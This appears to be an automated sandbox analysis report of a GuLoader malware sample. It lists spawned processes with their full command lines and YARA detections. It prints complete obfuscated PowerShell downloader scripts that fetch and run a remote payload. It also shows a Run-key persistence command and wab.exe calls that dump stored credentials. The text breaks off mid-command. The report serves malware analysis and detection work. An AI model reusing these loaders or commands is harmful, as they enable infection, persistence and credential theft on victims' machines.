                              Commandline:powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgarvesVenstk TresjKrabao leazlNongae SandrSpisenBrysteTar.isAnska]Socia=.mfan$jail,fTykneeL gmesKv knt Rosed Brisr Alena Ver gunpurt Urlie EnvonS,rafs Uvil ');$Laserjet=Sortkridtstegningens 'Indri$BegohSO.herkSansei EnerfS eketExigeeFlasktMonar1Tilba4 .isk.reconDStratowaff w HermnUdspilp,lygoAng.va BunddmirisFA.glui .otolAwesoe igh(Numis$T,gvohFrimey.dninp Embre S,earGood.mBinnon redeeHestesSkovtiAdopta Alte,Trudy$ AbonA.uggslOmnivmpomo,eIndlanIscenvSti.leinkublNapht)Ggede ';$Almenvel=$Ruinhobens[0];Caprellidae (Sortkridtstegningens 'Resin$ Praeg enstlZechsoMisseb E.deaPreanlAmtsv:LacriS Rottk NatiiSkalklHedipd EquipSt,pua Afsld DiscdAn,iteFryserHomoonGo.rie .ela2 Ph l4 O te9Sitzy=Grund(.odtgTKill eFro tsSyllitDisci-Prep,PKri.saSemiptSubvehPassi Forsl$CanccAOverml GamamNath eOrdgynFunktvSma.seKultul,dled) Bra. ');while (!$Skildpadderne249) {Caprellidae (Sortkridtstegningens 'Forha$SedergRev llOsciloAngakbKamgaaPa irlTaggy:TrappMChessoGatchlAntagdfugtsaHyttevkrickiKulsotAnskueamput=.kyph$.abent TranrDanseuA.kaneAller ') ;Caprellidae $Laserjet;Caprellidae (Sortkridtstegningens 'UpthrS isaptFlsk.aBrillrUdbldtVareb-Dest SKaut lslagteUpaakeInsinpFirep a bum4 Bund ');Caprellidae (Sortkridtstegningens '.etsp$WheregGaleolOdyssoBan bbJo,ana sy elUnsta:opgivS SspekFl eribigb,lM jusdAssaup.vmmea Sc,nd nterd Nonpe P,llrO hobnAsconemacul2Randy4F.yve9Phone=Blond(WaggoTMo,ioeBlancsChichtplumb- ArbePPreadaUnirrtTinfohK,lon Paras$ColeoAKamg.l Hor mAd neekom.dnOvercvLatcheStatelNo,co)Venog ') ;Caprellidae (Sortkridtstegningens ' Menu$kbarsgSolcrlGad toTecasb Tag aMortalFlues:TestaUInterdWavineUncurnBroded,tochr.errgsBarysa bl lr RaadbPrebeegillsjHaem,dSangleHydat= kand$KroatgGangblAnaxto GridbKonk aSko.glProto:SnitzlArgotyToldea Bra.nCredicW.lloeslalo+Phane+Ubetn%Grx,a$Term.GSengiyTilbarInforoAdenosl thocSvineobantip,ilatiRubbec Ch,k.MarkscHidrooFre.ru daninGalentUnhoo ') ;$hypermnesia=$Gyroscopic[$Udendrsarbejde];}$Exaltee=316524;$Umyndiges=29862;Caprellidae (Sortkridtstegningens 'F.rme$ F.digBu del FremoHa.tebCellea Rovil.ileu: offiJProh.eForfrdfun.teExpun T,ops=repai OutpGMyoseeBeskytF,rkl-indusCFraado Gul.nObsert Un,eeHe atnUslintSprin Pend$ andAHy,solkomp.mSku,geDumphnSnusevM trie.estilKrist ');Caprellidae (Sortkridtstegningens 'Trlkv$ Ov rgFi,zelintrooUtaalbbenigaYawpelNveny:kerateFedertHypereL vsar bsecn,hodei,lgest.achifStrygaLandsbIrrevrAlbueiThermkGo,dak.ersoeProspn I.ds Upisl=Unter .acop[ Bo bSHusary A chsGracitHamareExonem Slut.RaesoCAveceoB,mstn indev triueT,ldnrPre it Klas]Regi.:Stamb:IrratFIntr rForbloIotizmAllerBTfleda Unbastrafie,prin6Reduk4ReverS PsamtO erlrc.imbiWashbnAttrig lowe(Choke$Ram.iJS.anse RygedB weaeMagda)Store ');Caprellidae (Sortkridtstegningens ' ,ant$SeelfgSta,glL ndmoSta.abPhonoaA.lbelNi ot:k.rtoi ,nterRep.srUnclaehasles,oloutBlomsrspildaTeleoiLimnonE.ikka Nyl.bsuppolBevogyReve Ideli=Thyro Sy te[L,atuSTestuyasilisJona tTalkieSkarpmC.she. WaggT Serie MajoxUnasstRea,d.TrianEUdvikn Bi lc ForsoFremtdVicefiUdko.nParalgDati,]Udstd:S art:Cari,A Cen.SRy.keCal,enIFuldsISlide.B reaGFoto eDomintsprjtSUnthitSnowbrGunati DynenFevergInd k( Ting$ShavueRetrotUkurae VarmrAdlesnbarneiDan.rt Tetrf Teata.tiftbBomberKemikiPrstakBr,mlk Tr,aeBatchnS.ant)Chaus ');Caprellidae (Sortkridtstegningens ' Frem$N,llegDif elJermaoCruncbMotifaExhe lUpr.o: UnexA inglrTemalbCaliceOver jPrintdKo,resForreg Faldi.lerbvSki deK lorrCustof,pgefoTr,nkrbagnie .eopn Rasti ,raanMono gKolersGes,a=Balla$ In.iiTastarBriocrF rieeAsbolsPara,tSapotrSpeciaSama,i TyttnMa.blaRafflbNosomlforgry Vari.MarhesShalluRammeb t,les Ci atSpousrTryk i P.rfnSty.sgSer.a(Flypa$GavntEMulisxUndera Set l Car tAri,teVektoef,ust,sjlea$ septU Scism Phaey Odo,nWaketd G.ati LedegNati.eYaupos Ag i)Juice ');Caprellidae $Arbejdsgiverforenings;"
                              Imagebase:0x7ff6e3d50000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:02:09:04
                              Start date:31/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
                              Imagebase:0x7ff7458b0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:02:09:10
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgarvesVenstk TresjKrabao leazlNongae SandrSpisenBrysteTar.isAnska]Socia=.mfan$jail,fTykneeL gmesKv knt Rosed Brisr Alena Ver gunpurt Urlie EnvonS,rafs Uvil ');$Laserjet=Sortkridtstegningens 'Indri$BegohSO.herkSansei EnerfS eketExigeeFlasktMonar1Tilba4 .isk.reconDStratowaff w HermnUdspilp,lygoAng.va BunddmirisFA.glui .otolAwesoe igh(Numis$T,gvohFrimey.dninp Embre S,earGood.mBinnon redeeHestesSkovtiAdopta Alte,Trudy$ AbonA.uggslOmnivmpomo,eIndlanIscenvSti.leinkublNapht)Ggede ';$Almenvel=$Ruinhobens[0];Caprellidae (Sortkridtstegningens 'Resin$ Praeg enstlZechsoMisseb E.deaPreanlAmtsv:LacriS Rottk NatiiSkalklHedipd EquipSt,pua Afsld DiscdAn,iteFryserHomoonGo.rie .ela2 Ph l4 O te9Sitzy=Grund(.odtgTKill eFro tsSyllitDisci-Prep,PKri.saSemiptSubvehPassi Forsl$CanccAOverml GamamNath eOrdgynFunktvSma.seKultul,dled) Bra. ');while (!$Skildpadderne249) {Caprellidae (Sortkridtstegningens 'Forha$SedergRev llOsciloAngakbKamgaaPa irlTaggy:TrappMChessoGatchlAntagdfugtsaHyttevkrickiKulsotAnskueamput=.kyph$.abent TranrDanseuA.kaneAller ') ;Caprellidae $Laserjet;Caprellidae (Sortkridtstegningens 'UpthrS isaptFlsk.aBrillrUdbldtVareb-Dest SKaut lslagteUpaakeInsinpFirep a bum4 Bund ');Caprellidae (Sortkridtstegningens '.etsp$WheregGaleolOdyssoBan bbJo,ana sy elUnsta:opgivS SspekFl eribigb,lM jusdAssaup.vmmea Sc,nd nterd Nonpe P,llrO hobnAsconemacul2Randy4F.yve9Phone=Blond(WaggoTMo,ioeBlancsChichtplumb- ArbePPreadaUnirrtTinfohK,lon Paras$ColeoAKamg.l Hor mAd neekom.dnOvercvLatcheStatelNo,co)Venog ') ;Caprellidae (Sortkridtstegningens ' Menu$kbarsgSolcrlGad toTecasb Tag aMortalFlues:TestaUInterdWavineUncurnBroded,tochr.errgsBarysa bl lr RaadbPrebeegillsjHaem,dSangleHydat= kand$KroatgGangblAnaxto GridbKonk aSko.glProto:SnitzlArgotyToldea Bra.nCredicW.lloeslalo+Phane+Ubetn%Grx,a$Term.GSengiyTilbarInforoAdenosl thocSvineobantip,ilatiRubbec Ch,k.MarkscHidrooFre.ru daninGalentUnhoo ') ;$hypermnesia=$Gyroscopic[$Udendrsarbejde];}$Exaltee=316524;$Umyndiges=29862;Caprellidae (Sortkridtstegningens 'F.rme$ F.digBu del FremoHa.tebCellea Rovil.ileu: offiJProh.eForfrdfun.teExpun T,ops=repai OutpGMyoseeBeskytF,rkl-indusCFraado Gul.nObsert Un,eeHe atnUslintSprin Pend$ andAHy,solkomp.mSku,geDumphnSnusevM trie.estilKrist ');Caprellidae (Sortkridtstegningens 'Trlkv$ Ov rgFi,zelintrooUtaalbbenigaYawpelNveny:kerateFedertHypereL vsar bsecn,hodei,lgest.achifStrygaLandsbIrrevrAlbueiThermkGo,dak.ersoeProspn I.ds Upisl=Unter .acop[ Bo bSHusary A chsGracitHamareExonem Slut.RaesoCAveceoB,mstn indev triueT,ldnrPre it Klas]Regi.:Stamb:IrratFIntr rForbloIotizmAllerBTfleda Unbastrafie,prin6Reduk4ReverS PsamtO erlrc.imbiWashbnAttrig lowe(Choke$Ram.iJS.anse RygedB weaeMagda)Store ');Caprellidae (Sortkridtstegningens ' ,ant$SeelfgSta,glL ndmoSta.abPhonoaA.lbelNi ot:k.rtoi ,nterRep.srUnclaehasles,oloutBlomsrspildaTeleoiLimnonE.ikka Nyl.bsuppolBevogyReve Ideli=Thyro Sy te[L,atuSTestuyasilisJona tTalkieSkarpmC.she. WaggT Serie MajoxUnasstRea,d.TrianEUdvikn Bi lc ForsoFremtdVicefiUdko.nParalgDati,]Udstd:S art:Cari,A Cen.SRy.keCal,enIFuldsISlide.B reaGFoto eDomintsprjtSUnthitSnowbrGunati DynenFevergInd k( Ting$ShavueRetrotUkurae VarmrAdlesnbarneiDan.rt Tetrf Teata.tiftbBomberKemikiPrstakBr,mlk Tr,aeBatchnS.ant)Chaus ');Caprellidae (Sortkridtstegningens ' Frem$N,llegDif elJermaoCruncbMotifaExhe lUpr.o: UnexA inglrTemalbCaliceOver jPrintdKo,resForreg Faldi.lerbvSki deK lorrCustof,pgefoTr,nkrbagnie .eopn Rasti ,raanMono gKolersGes,a=Balla$ In.iiTastarBriocrF rieeAsbolsPara,tSapotrSpeciaSama,i TyttnMa.blaRafflbNosomlforgry Vari.MarhesShalluRammeb t,les Ci atSpousrTryk i P.rfnSty.sgSer.a(Flypa$GavntEMulisxUndera Set l Car tAri,teVektoef,ust,sjlea$ septU Scism Phaey Odo,nWaketd G.ati LedegNati.eYaupos Ag i)Juice ');Caprellidae $Arbejdsgiverforenings;"
                              Imagebase:0xaf0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2508655115.00000000085D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2511671395.000000000A87F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:02:09:11
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:02:09:20
                              Start date:31/05/2024
                              Path:C:\Windows\System32\dllhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                              Imagebase:0x7ff642ec0000
                              File size:21'312 bytes
                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:11
                              Start time:02:09:28
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Target ID:13
                              Start time:02:09:34
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:02:09:34
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:02:09:34
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\reg.exe
                              Wow64 process (32bit):true
                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
                              Imagebase:0xa00000
                              File size:59'392 bytes
                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:16
                              Start time:02:09:39
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:17
                              Start time:02:09:40
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:02:09:40
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:02:09:40
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
                              Imagebase:0x6f0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:02:09:41
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll 